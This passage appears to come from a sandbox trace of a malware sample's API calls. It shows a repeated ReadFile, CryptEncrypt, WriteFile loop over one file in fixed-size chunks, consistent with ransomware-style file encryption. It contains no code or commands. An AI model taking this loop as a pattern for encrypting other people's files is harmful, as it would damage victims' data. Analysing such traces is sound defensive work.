lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.998] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.998] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.998] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.998] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.998] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.999] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.999] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.999] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.999] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.999] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.039] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.040] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.044] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.044] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.044] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.044] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.044] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.044] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.045] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.045] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.045] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.045] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.045] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.045] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.046] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.046] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.046] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.046] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.047] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.047] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.047] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.047] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.047] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.047] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.047] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.047] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.047] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.048] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.048] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.048] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.048] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.048] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.048] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.048] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.048] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.048] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.048] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.049] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.049] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.049] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.049] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.049] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.049] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.052] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.052] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.052] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.052] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.053] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.053] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.053] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, 